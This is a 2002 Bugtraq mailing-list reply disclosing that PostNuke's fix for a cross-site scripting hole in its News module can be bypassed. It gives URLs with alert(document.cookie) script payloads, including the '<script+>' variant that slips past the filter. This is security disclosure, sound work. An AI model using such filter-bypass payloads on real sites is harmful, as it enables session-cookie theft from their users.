Bugtraq mailing list archives
Re: Postnuke XSS fixed
From: Daniel Woods <dwoods () ucalgary ca>
Date: Wed, 2 Oct 2002 10:09:33 -0600 (MDT)
Humm!
on 26th Sep the following url: http://news.postnuke.com/modules.php ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> used to give Alert PopUp and Error: DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' at line 23 now it gives: Sorry - $HTTP_GET_VARS contains javascript... Prompt fix by PostNuke team, great work Keep it up! :)
Not so fast on the praise :( It only took me a couple of workarounds to find ways to bypass the check. http://news.postnuke.com/modules.php ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> Using the request... ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script> gives me the DB Error: message And using the request... ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script> gives me the Alert Popup and DB Error: message... the '+' is treated as a blank. Thanks... Dan.
Current thread:
- Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 02)
- Re: Postnuke XSS fixed Daniel Woods (Oct 02)
- Re: Postnuke XSS fixed Sebastian Konstanty Zdrojewski (Oct 03)
- <Possible follow-ups>
- Re: Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 03)
- Re: Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 07)
- Re: Postnuke XSS fixed Daniel Woods (Oct 02)